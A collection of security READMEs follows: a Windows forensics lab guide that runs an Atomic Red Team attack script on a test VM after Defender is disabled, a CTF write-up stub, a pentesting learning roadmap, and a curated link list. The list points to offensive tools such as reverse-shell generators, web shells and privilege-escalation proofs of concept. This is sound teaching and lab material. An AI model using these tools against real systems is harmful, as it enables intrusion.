text
stringlengths 9
334k
|
---|
# Practical Windows Forensics
*Provided by Blue Cape Security, LLC*
<p align="center">
<img src="https://github.com/bluecapesecurity/bluecapesecurity/blob/main/BCS_banner.png" />
</p>
<div align="center">
**A quick DIY approach for performing a digital forensic analysis on a Windows 10 system**
</div>
---
*Links:*
- Check out the full [11-hour Practical Windows Forensics (PWF) course](https://bluecapesecurity.com/courses/practical-windows-forensics/)
- Join the [Discord Community](https://discord.gg/WKsaGE2CV3)
- Watch the [PWF intro videos on YouTube](https://youtu.be/JDzJHyBJIXk)
- Use the [Practical Windows Forensics - Cheat Sheet](https://github.com/bluecapesecurity/PWF/blob/main/Resources/PracticalWindowsForensics-cheat-sheet.pdf) to guide your investigations.
**Steps TLDR:**
* Prepare a Windows target VM
* Execute attack script (based on the AtomicRedTeam framework) on target VM
* Acquire memory and disk images
* Setup a Windows forensic VM
* Get started with your Windows forensic analysis
Prerequisites:
* [VirtualBox or VMWare hypervisor](https://bluecapesecurity.com/build-your-lab/virtualization/)
* Host system requirements:
* 4GB+ RAM for running Windows VMs (There are two VMs, but they do not have to run at the same time)
* Disk storage for 2 x Windows VMs using about 20GB and 40GB, respectively. Additionally, you'll need around 30 GB for handling disk and memory images as well as additional files.
![Investigation Roadmap](Investigation-roadmap.png)
---
## Attack Scenario
The attack simulation script in this repo can be used to create a realistic compromise scenario on a Windows system. It leverages selected Atomic Red Team tests that simulate commonly observed techniques in real world attacks. The script `PWF/AtomicRedTeam/ART-attack.ps1` first installs [Invoke-AtomicRedTeam](https://github.com/redcanaryco/invoke-atomicredteam) and then executes a number of techniques. The techniques executed in this script are highlited the MITRE ATT&CK framwork below.
![Attack Script](AtomicRedTeam/PWF_Analysis-MITRE.png)
## Preparation
### 1 Prepare Target System
1.1) Download, install and configure a free Windows 10 Enterprise Evaluation VM from the Microsoft Evaluation Center
* Download x64 ISO: https://www.microsoft.com/en-us/evalcenter/evaluate-windows-10-enterprise
* In VirtualBox, create a new VM, import the ISO and run it to install Windows 10.
* Take a snapshot once the VM is set up to be able to roll back to a known good state.
* **Note:** In the PWF course you will see a Win10 MSEdge developer VM with user "IEUser" pre-configured. This VM is no longer available and thus you need to download and install your own Windows 10 target VM.
* **Pause Windows Updates** to avoid additional noise: Go to Settings -> Windows Update -> Advanced Options -> Pause updates
* **Install Sysmon** for detailed event logging.
* Download the script in `PWF/Install-Sysmon/Install-Sysmon.ps1` onto the system
* Run PowerShell **as administrator**, navigate to the script and execute it `.\Install-Sysmon.ps1`
* **Disable all Defender settings**: Before executing the attack, go to "Virus & threat protection settings" -> Manage settings -> Disable all the features shown. *Note that this is only a temporary solution and real-time protection will turn itself on automatically after a while*.
1.2) Execute the attack script on the target system
* Download the script in `PWF/AtomicRedTeam/ART-attack.ps1` onto the system
* Run PowerShell **as administrator!**, navigate to the script and :fire: *execute it* :fire: `.\ART-attack.ps1`
* Ensure that the target VM has internet access as it will download the Invoke-AtomicRedTeam Framework. Furthermore, press [Y] Yes if PowerShell asks for installing additional features.
* Verify that the powershell logs show successful executions of atomics. (If unsuccessful shut down the VM, revert to the previous snapshot and implement fixes before running the script again.)
* Do **not close any windows or processes** and proceed to the next step!
### 2 Disk and Memory - Data Acquisition
2.1) Pause (in VirtualBox) or Suspend (in VMWare) the VM and take a snapshot
2.2) Take an image of the VM memory
* Create an "evidence" folder on the host system to store the following disk and memory images.
*VMWare memory acquisition*
- Open the *.vmwarevm* directory of the VM in a terminal
- Copy the .vmem and the associated .vmsn (snapshot) file in your evidence folder
*VirtualBox memory acquisition*
* Open your terminal (Mac/Linux) or cmd (Windows) to run *vboxmanage* (in Windows it is located under C:\Program Files\Oracle\VirtualBox)
* Identify the VM's UUID: `vboxmanage list vms`
* Create a snapshot of the VM's memory: `vboxmanage debugvm <VM_UUID> dumpvmcore --filename win10-mem.raw`
2.3) Take an image of the VM disk
* Upause and shut down the VM.
*VMWare disk image acquisition*
* Locate the VMDK split files in the VM's directory. These are all files ending with *.vmdk*.
* Depending on the number of snapshots there could be several versions of VMDK file sequences. In that case the sequence with the highest number in the name will be the one with the latest status e.g. as in "Virtual Disk-XXX.vmdk"
* Export the vmdk image. There are two options:
* Copy all the split files of the latest sequence "Virtual Disk-xxx.vmdk" to "Virtual Disk-xxx-s0016.vmdk" into your evidence folder.
* Alternatively, create a single VMDK from split files: `C:\Program Files (x86)\VMware\VMware Player\vmware-vdiskmanager.exe» -r «d:\VMLinux\vmdkname.vmdk» -t 0 MyNewImage.vmdk`
*VirtualBox disk image acquisition*
* Open terminal or cmd
* Identify the VM's UUID: `vboxmanage list vms`
* Identify the VM's disk UUID: `vboxmanage showvminfo <VM_UUID>` Note the UUID of the disk in row *IDE Controller*
* Export the disk using the disk UUID into RAW format: `vboxmanage clonemedium disk <disk_UUID> --format raw win10-disk.raw`
2.4) Validate integrity of memory and disk images by creating SHA1 hashes and saving them in a text file along with the images.
*Windows*: Open PowerShell and navigate to the folder. Obtain hashes by executing: `Get-FileHash -Algorithm SHA1 <file>`
*Mac/Linux*: Open terminal and navigate to the folder. Obtain hashes by executing: `shasum <file>`
## Forensic Analysis
### 3 Set up Your Forensic Workstation
3.1) Set up a forensic VM as outlined in the following link: https://bluecapesecurity.com/build-your-forensic-workstation/
* It is recommended to install a Windows 2019 Server VM from the Microsoft Evaluation Center.
* Create a new VM in Virtualbox. Assign at least **4 GB of RAM and 100 GB of disk storage with the dynamically allocated option** selected. This means the disk will start small (e.g. basic size of Windows 10-20 GB in size) and grows as we add more data.
* Install VirtualBox Guest Additions and enable shared clipboard and file sharing with the evidence folder on the host system.
* When the Windows system is installed, follow the instructions in the section "Configure the Windows Environment – DFIR Best Practices".
* When the setup is complete, install the following tools:
* Kali Linux subsystem, Volatility
* Arsenal Image Mounter, FTK Imager, Eric Zimmerman Tools, KAPE, RegRipper, EventLog Explorer, Notepad++
* Take a snapshot once the setup is complete.
### 4 Forensic memory and disk analysis
With the forensic workstation installed and the evidence acquired, we can now beginn with the analysis of the memory and disk images. Some of the forensic artifacts that we want to investigate are:
* User accounts
* Program execution artifacts
* Persistence (run keys, scheduled tasks, startup scripts, Windows services)
* File creation and deletion (NTFS artifacts)
* PowerShell executions
* DLL process injection
* Office document analysis
* Timeline analysis
Happy forensicating!
Copyright © 2022 [BlueCapeSecurity](https://www.bluecapesecurity.com)
*Cyber Security Skills Training & Career Coaching*
Disclaimer: The material is for educational purposes only! I do not assume and hereby disclaim any liability to any party for any errors, disruptions, damages, or other negative consequences resulting from applying the information that I share.
|
# CTF HackTheBox 2021 Cyber Apocalypse 2021 - CTF HTB
Writeups for [CTF HackTheBox 2021 Cyber Apocalypse 2021](https://www.hackthebox.eu/cyber-apocalypse-ctf-2021)
5 DAY CTF!
![certificate2.JPG](images/certificate2.JPG)
![ctf.gif](images/ctf.gif)
|
# HowToStart
## Web Pen-Tesing
- Learning Programing language (PHP, JS, MySQL)
- PHP: it will help to understand the applications so you should know it well
- JS: It will not just help you with JS and making new payloads, but it will make you to dig deep with the JS files it will give you some Cool things.
- MySQL: this will help to understand the SQL injection and making right queries when you trying to exploit.
- Understand the vulnerabilities
- You should know what is the vulnerability, What Code makes this vulnerability, How to find this vulnerability in Applications, and How to solve it.
- Practice
- [PortSwigger Web Security Academy](https://portswigger.net/web-security)
- [Hacker101](https://www.hacker101.com/)
- [Try Hack Me](https://tryhackme.com/)
- [Pentester Lab](https://pentesterlab.com/)
- Playing CTF
- CTFs is have some real world examples for a vulnerabilities or CVEs or some new exploits you will know from it.
- Do some Bug Hunting and this website will help [BugBountyHunter](https://bugbountyhunter.com/).
- Watch this [Methodology](https://www.youtube.com/watch?v=gIz_yn0Uvb8) by [Jason Haddix](https://twitter.com/jhaddix).
- Initially, you can start with hunting on programs that offer points to gain experience.
- You can take eWAPTx & eWAPT
- eWAPT: it will be a good one in the beginning because it has some basics about Web Pen-Testing.
- eWAPTx: this one is advanced one you can start with it when you be at least good with the vulnerabilities and the matriales in eWAPT.
- You can take OSWE But it is advanced and need Code Review Skills.
- [Web Pen-Testing Course](https://www.youtube.com/playlist?list=PLv7cogHXoVhXvHPzIl1dWtBiYUAL8baHj) by [Ebrahem Hegazy](https://twitter.com/Zigoo0) (Arabic Course)
- This will help you to understand the vulnerabilities, how to send a right report, and will Bug Hunting live.
- [My Free Web Pentesting Course](https://www.youtube.com/playlist?list=PLsB1gqjeUAh_yEuLgtZ0ppLlExcYOL2Kp)
- [Collection of Bug Hunting Reports](https://pentester.land/list-of-bug-bounty-writeups.html)
## Network Pentesing
- Network+
- It will make you understand network, Design and implement functional networks, and implement network security standard and protocols.
- Linux+
- You will understand linux and how to use it from this course.
- [TCM TheCyberMentor](https://academy.tcm-sec.com/) Course
- Scripting with Python or Bash
- Use any scripting language it will be you with automation.
- Understanding Operating systems windows/linux (You can take OS course)
- taking a OS course it will make you understand the OS kernal and Memory Management.
- Good course for Privilege escalation for [linux](https://tryhackme.com/room/linuxprivescarena) & [Windows](https://www.aldeid.com/wiki/TryHackMe-Windows-PrivEsc-Arena)
- Practice (it will be hard at first but after some tries, it will be okay)
- Solve machines on [Vulnhub](https://www.vulnhub.com/)
- Solve machines on [Hackthebox](https://www.hackthebox.eu/)
- [The Cyber Mentor Network Pentesting Course](https://www.youtube.com/playlist?list=PLLKT__MCUeiwBa7d7F_vN1GUwz_2TmVQj)
- Basic knowledge of Reverse Engineering
- Certificates
- PTS (Beginners)
- PTP
- PTX
- OSCP
## Mobile Pentesting
- Basics of Linux (you can use this [Book](https://drive.google.com/file/d/1jvphfw61odAcGixV7erYcRui2Iz9tjAu/view))
- https://techvomit.net/android-security-notes/
- https://github.com/B3nac/Android-Reports-and-Resources
- eMAPT Course (Its very basics)
- This is not the best one but it will give you the first step but it's not all think
- SEC575 from SANS
- FOR585 from SANS
- Good [Blog](http://blog.itselectlab.com/?page_id=7703) as Reference
- To Practice you can try some Bug Bouny Hunt on programs use Mobile Apps
- [Android Reverse Engineering 101](https://www.ragingrock.com/AndroidAppRE/reversing_intro.html)
- [OWASP Mobile Security Testing Guide](https://leanpub.com/mobile-security-testing-guide)
- [Exploiting memory corruption vulnerabilities on Android](https://blog.oversecured.com/Exploiting-memory-corruption-vulnerabilities-on-Android/)
- [Android: arbitrary code execution via third-party package contexts](https://blog.oversecured.com/Android-arbitrary-code-execution-via-third-party-package-contexts)
- [Twitter Thread for some apps to practice](https://twitter.com/cyph3r_asr/status/1413438299545296902)
- [Mobile Application Penetration Testing Cheat Sheet](https://github.com/tanprathan/MobileApp-Pentest-Cheatsheet#contribution)
- [check list for webView](https://blog.oversecured.com/Android-security-checklist-webview/)
- [Hacktricks have all topics for android](https://book.hacktricks.xyz/mobile-apps-pentesting/android-app-pentesting)
- [Android Application Security Series](https://manifestsecurity.com/android-application-security/)
- [Try hack me (androidhacking101) room](https://tryhackme.com/room/androidhacking101)
- [Getting Started With Objection + Frida](https://www.secjuice.com/objection-frida-guide/)
- My [Mobile Pentesting Playlist](https://www.youtube.com/playlist?list=PLsB1gqjeUAh9WonIWRL-kREiliNi874hw)
## Malware Analysis
- This is a [Roadmap](https://drive.google.com/drive/folders/1grlkHlPtwoLiYiNFzf1-LD0HjDwtuOUl) from [Muhammed Talaat](https://www.facebook.com/vs.viro)
- [How to Build Your Career in Malware Analysis](https://www.facebook.com/amr.thabet.376/videos/397136105060646/) (Arabic Session)
## Binary Exploitation
- [Live Overflow Playlist](https://www.youtube.com/playlist?list=PLhixgUqwRTjxglIswKp9mpkfPNfHkzyeN)
- [Pwn College](https://pwn.college/) will give you a good basics, don't forget to practice after leasons on [pwn dojo](https://dojo.pwn.college/challenges).
|
---
title: Awesome Security Resources
description: A collection of tools, cheatsheets, operating systems, learning materials, and more all related to security. There will also be a section for other Awesome lists that relate to cybersecurity.
tags: [penetration-testing, tools, cheatsheet, awesome, security]
---
![Awesome Glasses](https://cdn.rawgit.com/sindresorhus/awesome/master/media/logo.svg)
# Awesome Security Resources [![Awesome](https://awesome.re/badge.svg)](https://awesome.re)
A collection of tools, cheatsheets, operating systems, learning materials, and more all related to security. There will also be a section for other Awesome lists that relate to cybersecurity.
I seem to forget about all the tools and resources when attacking, defending, responding, or looking to learn about cyber security, the purpose of this is to help fix that.
## Table of Contents
* [Awesome Security Resources](#awesome-security-resources)
* [Security Focused Operating Systems](#security-focused-operating-systems)
* [Penetration Testing Tools](#penetration-testing-tools)
* [Malware Analysis](#malware-analysis)
* [Reverse Engineering](#reverse-engineering)
* [Networking](#networking)
* [Exploit Tools](#exploit-tools)
* [OSINT](#osint)
* [Practice Sites](#practice-sites)
* [Youtube Channels](#youtube-channels)
* [Awesome Repos](#awesome-repos)
* [Walkthroughs](#walkthroughs)
* [Learning Materials](#learning-materials)
* [Books and Cheatsheets](#books-and-cheatsheets)
* [Podcasts](#podcasts)
* [Documentation](#documentation)
* [Industrial Control System Info](#industrial-control-system-info)
* [Contributing](#contributing)
### Security Focused Operating Systems
Name | Description
---- | ----
[Commando VM](https://github.com/fireeye/commando-vm) | Virtual Machine dedicated to penetration testing using Windows 10 built by FireEye.
[FLARE-VM](https://www.fireeye.com/blog/threat-research/2017/07/flare-vm-the-windows-malware.html) | Virtual Machine dedicated to malware analysis and reverse engineering using Windows 10 built by FireEye.
[Kali Linux](https://www.kali.org) | Open source linux operating system. Lots of built in tools for penetration testing and offensive security.
[Parrot OS](https://parrotsec.org) | Debian-based linux operting system focused on security and privacy. Has lots of built in tools.
[SIFT Workstation](https://digital-forensics.sans.org/community/downloads) | A group of free open-source incident response and forensic tools designed to perform detailed digital forensic examinations in a variety of settings.
### Penetration Testing Tools
These tools are broken up into 4 categories. Enumeration, Exploitation, Privilege Escalation, and Miscellaneous.
* Enumeration tools are any tools that help in the process of collecting more information about the target being attacked.
* Exploitation tools are any tools that help in exploiting the target after it has been enumerated.
* Privilege Escalation tools are the tools that will aid in vertical or horizontal permission change.
* Micscellaneous tools are any pentesting tools that don't fit in the 3 above categories.
Name | Description
---- | ----
**Enumeration** |
[Nmap](https://nmap.org) | A free and open source utility for network discovery and security auditing.
[LinEnum](https://github.com/rebootuser/LinEnum) | A scripted local linux enumeration tool.
[PSPY](https://github.com/DominicBreuker/pspy) | A command line tool designed to snoop on processes without need for root permissions.
[WPScan](https://github.com/wpscanteam/wpscan) | A free, for non-commercial use, black box WordPress security scanner written for security professionals and blog maintainers to test the security of their WordPress websites.
**Exploitation** |
[Exploit Suggester](https://github.com/wwong99/pentest-notes/blob/master/scripts/xploit_installer.py) | Python script to suggesst different exploits to run on different Linux and Windows machines.
[p0wny shell](https://github.com/flozz/p0wny-shell) | Single-file PHP shell.
[SharpCat](https://github.com/Cn33liz/SharpCat) | A Simple Reversed Command Shell which can be started using InstallUtil (Bypassing AppLocker)
[ShellPop](https://github.com/0x00-0x00/ShellPop) | Generate easy and sophisticated reverse or bind shell commands to help you during penetration tests.
[Shellcode tools](https://github.com/malware-unicorn/shellcode_tools) | About miscellaneous tools written in Python, mostly centered around shellcodes.
[ZackAttack!](https://github.com/urbanesec/ZackAttack) | A new Tool Set to do NTLM Authentication relaying unlike any other tool currently out there.
**Privilege Escalation** |
[DirtyCow POC](https://github.com/dirtycow/dirtycow.github.io/wiki/PoCs) | Table listing the source code to several different variations of dirtycow.
[GTFOBins](https://gtfobins.github.io) | A curated list of Unix binaries that can used to bypass local security restrictions in misconfigured systems.
[Unix Privilege Escalation](https://github.com/pentestmonkey/unix-privesc-check) | Shell script to check for simple privilege escalation vectors on Unix systems.
**Miscellaneous** |
[CyberChef](http://icyberchef.com/) | Encoding and decoding tool for a variety of different ciphers.
[Kali Tools](https://tools.kali.org/tools-listing) | List of all the tools that are pre-installed on Kali linux and an explanation to what they do.
[Hack Tricks](https://book.hacktricks.xyz/welcome/readme) | Welcome to the page where you will find each hacking trick/technique/whatever I have learnt in CTFs, real life apps, and reading researches and news.
[Payload All the Things](https://github.com/swisskyrepo/PayloadsAllTheThings) | A list of useful payloads and bypass for Web Application Security and Pentest/CTF.
[Pentest Book](https://pentestbook.six2dez.com) | This book contains a bunch of info, scripts and knowledge used during my pentests.
[Pentest Checklist](https://github.com/netbiosX/Checklists) | Different Checklists to run through durring a pentest engagement.
[PWNTools](https://github.com/Gallopsled/pwntools) | CTF framework and exploit development library.
[Red Team Toolkit](https://github.com/Johnson90512/Red-Teaming-Toolkit) | A collection of open source and commercial tools that aid in red team operations.
[Various Pentest Tools](https://github.com/trickster0?tab=repositories) | Pentesting tools from a pentester.
### DFIR
Name | Description
---- | ----
[Jeffrey's Image Metadata Viewer](http://exif.regex.info/exif.cgi) | Shows the data that might be inside a digital image file.
[Steganography Toolkit](https://github.com/DominicBreuker/stego-toolkit) | Collection of steganography tools - helps with CTF challenges.
[Volatility](https://github.com/volatilityfoundation/volatility) | An advanced memory forensics framework.
[VolUtility](https://github.com/kevthehermit/VolUtility) | Web App for Volatility framework
### Malware Analysis
Name | Description
---- | ----
[Triage](https://tria.ge) | Malware sandbox or analysis.
[Hybrid Analysis](https://hybrid-analysis.com) | Free automated malware service
[Virus Total](https://www.virustotal.com/gui/) | Online malacious file analyzer
### Reverse Engineering
Name | Description
---- | ----
[GDB](http://www.gnu.org/software/gdb/download/) | The GNU Project Debugger
[IDA](https://www.hex-rays.com/products/ida/support/download_freeware/) | Dissassembler has been the golden standard for years
[Ghidra](https://ghidra-sre.org) | Ghidra is a software reverse engineering (SRE) framework created and maintained by the National Security Agency Research Directorate.
[OllyDbg](http://www.ollydbg.de/) | A 32-bit assembler level analysing debugger for Microsoft Windows.
[Radare2](https://www.radare.org/r/) | A portable reversing framework.
### Networking
Name | Description
---- | ----
[CCNA Subreddit](https://www.reddit.com/r/ccna/wiki/index) | Subreddit dedicated to the CCNA Exam.
[CCNA\CCENT Training Series](https://www.youtube.com/playlist?list=PLmdYg02XJt6QRQfYjyQcMPfS3mrSnFbRC) | A full course of 84 videos for CCNA and CCENT Routing and Switching taught by Cisco Instructor Andrew Crouthamel.
[CCNA Training Series](https://www.youtube.com/playlist?list=PLh94XVT4dq02frQRRZBHzvj2hwuhzSByN) | Youtube Series on CCNA information.
[Impacket](https://github.com/SecureAuthCorp/impacket) | A collection of Python classes for working with network protocols.
[SubnettingPractice](https://subnettingpractice.com) | The most extensive subnetting practice site on the web!
[Subnetting.net](https://www.subnetting.net/Subnetting.aspx?mode=practice) | Sunetting practice tools.
[Wireshark](https://www.wireshark.org/download.html) | The world’s foremost and widely-used network protocol analyzer.
[Wireshark Certified Network Analyst](https://www.youtube.com/watch?v=FaoheEdkqdc&index=10&list=PLTIJiKI4vOA37qUl-5ztWYcCE6zpscF6j) | Youtube series of 15 videos about the WCNA.
[Wireshark Training Documenation](https://www.wireshark.org/docs/) | In depth documentation on how to use wireshark.
### Exploit Tools
Name | Description
---- | ----
### OSINT
Name | Description
---- | ----
[Bing Image Search](https://www.bing.com/visualsearch?FORM=ILPVIS) | Reverse image search.
[DeHashed](https://dehashed.com/) | A hacked-database search-engine.
[DNSDumpster](https://dnsdumpster.com) | Free domain research tool that can discover hosts related to a domain.
[Jeffrey's Image Metadata Viewer](http://exif.regex.info/exif.cgi) | Simple and free tool that shows the Exif data on images.
[NameCheck](https://namechk.com/) | Search site for usernames across different platforms.
[NameCheckup](https://namecheckup.com/) | Search site for usernames across different platforms.
[HaveIBeenPwned](https://haveibeenpwned.com/) | Check to see if an account has been involved in a databreach.
[Scylla.sh](https://scylla.sh/api) | Database dumps search site.
[Sherlock](https://github.com/sherlock-project/sherlock) | Hunt down social media accounts by username acrross social networks.
[Threat Jammer](https://threatjammer.com) | REST API for developers, security engineers, and other IT professionals to access curated threat intelligence data from a variety of sources.
[TinEye](https://tineye.com/) | Reverse image search.
[Online Traceroute](https://hackertarget.com/online-traceroute/) | Online Traceroute using MTR.
[WhatsMyName](https://whatsmyname.app/) | Tool that allows you to enumerate usernames across many websites.
[Yandex](https://yandex.com/images/) | Reverse image search.
### Practice Sites
Name | Description
---- | ----
[Attack/Defense Labs](https://public.attackdefense.com) | Very well built security attack and defense labs.
[Certified Hacker](http://certifiedhacker.com) | Intentionally vulnerable website.
[Defend the Web](https://defendtheweb.net/?hackthis) | An interactive security platform where you can learn and challenge your skills.
[Enigma Group](https://www.enigmagroup.org) | Web application security training.
[Exploit Education](https://exploit.education) | Provides a variety of resources that can be used to learn about vulnerability analysis, exploit development, software debugging, binary analysis, and general cyber security issues.
[FLAWS](http://flaws.cloud) | AWS specific security challenge site.
[GameofHacks](https://www.gameofhacks.com) | This game was designed to test your application hacking skills.
[Gh0st Networks](http://www.gh0st.net) | CTF site for security practice.
[Google CTF](https://capturetheflag.withgoogle.com) | Yearly CTF hosted by Google.com.
[HackMe](https://hack.me) | Site to share vulnerable web applications for practice in web hacking.
[HackTheBox](https://www.hackthebox.eu) | Boot to root penetration testing practice site.
[HackThisSite](https://www.hackthissite.org) | Wargame prictice site and community forums.
[Hacking Lab](https://www.hacking-lab.com/index.html) | An online ethical hacking, computer network and security challenge platform, dedicated to finding and educating cyber security talents.
[Hellbound Hackers](https://www.hellboundhackers.org) | Hacking practice site.
[IO](http://io.netgarage.org) | Wargame site to practice hacking skills.
[OvertheWire](https://overthewire.org/wargames/) | Begniier wargames that teach the basics of security.
[Microcorruption](https://microcorruption.com/login) | Wargame to help in using a debugger and Assembly Language.
[PentestIt](https://lab.pentestit.ru) | Penetration Testing Laboratories.
[Pentest Practice](https://www.pentestpractice.com/challenges/tutorial) | Online security training environment.
[Pentest Training](https://pentest.training/index.php) | A simple website used as a hub for information revolving around the varies services we offer to help both experienced and new penetration testers practice and hone their skills.
[Permanent CTF List](https://captf.com/practice-ctf/) | List of CTFs that are always available online or able to be downloaded.
[Pwnable.kr](http://pwnable.kr) | Wargame site to help improve hacking skills.
[Pwnable.tw](https://pwnable.tw) | A wargame site for hackers to test and expand their binary exploiting skills.
[Reversing.kr](http://reversing.kr/index.php) | Site to test your Cracking and Reverse Engineering ability.
[Ring0CTF](https://ringzer0ctf.com) | Hacking practice site.
[RootMe](https://www.root-me.org/?lang=en) | Hacking practice site.
[SmashTheStack](http://smashthestack.org/wargames.html) | Site with various wargames available to practice.
[Try2Hack](http://www.try2hack.nl) | This site provides several security-oriented challenges.
[TryHackMe](https://tryhackme.com) | Room based site for hacking practice with good instruction.
[VulnHub](https://www.vulnhub.com) | Downloadable virtual machines to practice hacking.
[WeChall](https://www.wechall.net) | Security challenge site.
[WeChalls](https://w3challs.com) | Wargames to practice hacking.
**Practice Labs** |
[Metasploitable](https://information.rapid7.com/download-metasploitable-2017.html?LS=1631875&CS=web) | Intentionally vulnerable target machine for evaluating Metasploit
[Pentest Lab](https://github.com/Sliim/pentest-lab) | contains examples to deploy a penetration testing lab on OpenStack provisioned with Heat, Chef and Docker.
[SecGen](https://github.com/cliffe/SecGen) | Creates vulnerable virtual machines, lab environments, and hacking challenges, so students can learn security penetration testing techniques.
[WebGOAT](https://owasp.org/www-project-webgoat/) | A deliberately insecure application that allows interested developers just like you to test vulnerabilities commonly found in Java-based applications that use common and popular open source components.
### Youtube Channels
Name | Description
---- | ----
[13Cubed](https://www.youtube.com/channel/UCy8ntxFEudOCRZYT1f7ya9Q) | This channel covers information security-related topics including Digital Forensics and Incident Response (DFIR) and Penetration Testing.
[Blackhat](https://www.youtube.com/c/BlackHatOfficialYT/videos) | This is the channel for the security conference, with lots of talks and demonstrations on different security topics.
[Guided Hacking](https://www.youtube.com/c/GuidedHacking/videos) | A hacking and reverse engineering community with a focus on game hacking.
[IppSec](https://www.youtube.com/c/BlackHatOfficialYT/videos) | This channel shows walkthroughs of different HackTheBox machines.
[John Hammond](https://www.youtube.com/channel/UCVeW9qkBjo3zosnqUbG7CFw) | This channel covers solving CTFs and programming.
[Learn Forensics](https://www.youtube.com/channel/UCZ7mQV3j4GNX-LU1IKPVQZg) | This channel is devoted to computer forensics.
[LiveOverflow](https://www.youtube.com/channel/UClcE-kVhqyiHCcjYwcpfj9w) | Just a wannabe hacker... making videos about various IT security topics and participating in hacking competitions.
[Stacksmashing](https://www.youtube.com/channel/UC3S8vxwRfqLBdIhgRlDRVzw) | This channel uses Ghidra to reverse engineer various things.
### Awesome Repos
Name | Description
---- | ----
[Android Security](https://github.com/ashishb/android-security-awesome#readme) | A collection of android security related resources.
[Application Security](https://github.com/paragonie/awesome-appsec#readme) | A curated list of resources for learning about application security.
[CTF](https://github.com/apsdehal/awesome-ctf#readme) | A curated list of CTF frameworks, libraries, resources and softwares.
[Cybersecurity Blue Team](https://github.com/fabacab/awesome-cybersecurity-blueteam#readme) | A curated collection of awesome resources, tools, and other shiny things for cybersecurity blue teams.
[DevSecOps](https://github.com/TaptuIT/awesome-devsecops#readme) | Curating the best DevSecOps resources and tooling.
[Embedded and IoT Security](https://github.com/fkie-cad/awesome-embedded-and-iot-security#readme) | A curated list of awesome embedded and IoT security resources.
[Fuzzing](https://github.com/cpuu/awesome-fuzzing#readme) | A curated list of awesome Fuzzing(or Fuzz Testing) for software security.
[GDPR](https://github.com/bakke92/awesome-gdpr#readme) | Protection of natural persons with regard to the processing of personal data and on the free movement of such data.
[Hacking - carpedm20](https://github.com/carpedm20/awesome-hacking#readme) | A curated list of awesome Hacking tutorials, tools and resources.
[Hacking - Hack with Github](https://github.com/Hack-with-Github/Awesome-Hacking) | A collection of various awesome lists for hackers, pentesters and security researchers.
[Hacking - vitalysim](https://github.com/vitalysim/Awesome-Hacking-Resources) | A collection of hacking / penetration testing resources to make you better!
[Honeypots](https://github.com/paralax/awesome-honeypots#readme) | An awesome list of honeypot resources
[Industrial Control Systems Security](https://github.com/hslatman/awesome-industrial-control-system-security) | A curated list of resources related to Industrial Control System (ICS) security.
[ICS Writeups](https://github.com/neutrinoguy/awesome-ics-writeups) | Collection of writeups on ICS/SCADA security.
[Incident Response](https://github.com/meirwah/awesome-incident-response#readme) | A curated list of tools for incident response.
[Lockpicking](https://github.com/fabacab/awesome-lockpicking#readme) | A curated list of awesome guides, tools, and other resources related to the security and compromise of locks, safes, and keys.
[Malware Analysis](https://github.com/rshipp/awesome-malware-analysis#readme) | A collention of awesome malware analysis tools
[Pentest](https://github.com/enaqx/awesome-pentest) | A collection of awesome penetration testing resources, tools, and other shiny things.
[Pcap Tools](https://github.com/caesar0301/awesome-pcaptools) | A collection of tools developed by other researchers in the Computer Science area to process network traces. All the right reserved for the original authors.
[Reversing](https://github.com/tylerha97/awesome-reversing) | A curated list of awesome reversing resources.
[Security](https://github.com/sbilly/awesome-security#readme) | A collection of awesome software, libraries, documents, books, resources and cools stuffs about security.
[Vehicle Security and Car Hacking](https://github.com/jaredthecoder/awesome-vehicle-security#readme) | A curated list of resources for learning about vehicle security and car hacking.
[Web Security](https://github.com/qazbnm456/awesome-web-security#readme) | A curated list of Web Security materials and resources.
[Windows Exploitation](https://libraries.io/github/enddo/awesome-windows-exploitation) | A curated list of awesome Windows Exploitation resources, and shiny things.
### Walkthroughs
Name | Description
---- | ----
[Hackso.me](https://hackso.me/categories/) | CTF, HacktheBox, and Vulnhub walkthroughs
[HackTheBox Guides](https://0xdf.gitlab.io/) | Guides/Walkthroughs for various retired HacktheBox machines.
### Learning Materials
Name | Description
---- | ----
**Enumeration** |
[Advanced Nmap:Scanning Firewalls](https://www.opensourceforu.com/2011/02/advanced-nmap-scanning-firewalls/) | Advanced Nmap techniques for how to scann various types of firewalls.
[Learning Nmap: The Basics - Part 1](https://www.opensourceforu.com/2010/08/nmap-basics/) | The basics of how to use nmap.
[Advanced Nmap: Some Scan Types - Part 2](https://www.opensourceforu.com/2010/11/advanced-nmap-some-scan-types/) | Various Nmap scan types, and the practical use of these commands to scan various devices and networks.
[Advanced Nmap: Scanning Techniques Continued - Part 3](https://www.opensourceforu.com/2010/12/advanced-nmap-scanning-techniques-continued/) | More interesting scanning techniques.
[Advanced Nmap: Fin Scan & OS Detection](https://www.opensourceforu.com/2011/01/advanced-nmap-fin-scan-and-os-detection/) | Various other command-line options.
[db_nmap](https://machn1k.wordpress.com/tag/db_nmap/) | Running nmap from within metasploit.
[GoBuster Guide](https://www.hackingarticles.in/comprehensive-guide-on-gobuster-tool/) | Comprehensive guide on GoBuster tool.
[Parsing ls](http://mywiki.wooledge.org/ParsingLs) | Why you shouldn't parse the output of ls(1).
**Exploitation**|
[AppLocker Bypass](https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/) | Using Rundll32 to bypass Applocker.
[Attacking & Securing WordPress](https://hackertarget.com/attacking-wordpress/) | Tecniques for enumeration and exploitation of wordpress sites.
[Executing Meterpreter in Memory](https://www.n00py.io/2018/06/executing-meterpreter-in-memory-on-windows-10-and-bypassing-antivirus/) | technique for executing an obfuscated PowerShell payload using Invoke-CradleCrafter in memory.
[How to hack a Wordpress site](https://www.hackingloops.com/how-to-hack-wordpress/) | Hacking a wordpress sites using different techniques.
[How to pentest your WordPress site](https://hackertarget.com/attacking-wordpress/) | How to perform a pentest on you a wordpress site. More techniques and tools.
[Metasploit Tutorial](https://www.opentechinfo.com/metasploit-tutorials/) | Metasploit Tutorial for beginners: Master in 5 minutes.
[Practical guide to NTLM Relaying](https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html) | Practical guide to help clear up any confusion regarding NTLM relaying.
[WordPress plugin Vulneribilities](https://wpscan.com/plugins) | List of all vulnerabilities for WordPress plugins.
**Reverse Engineering** |
[Assembly Programming Tutorial](https://www.tutorialspoint.com/assembly_programming/index.htm) | A tutorial on programming in nasm Assembly.
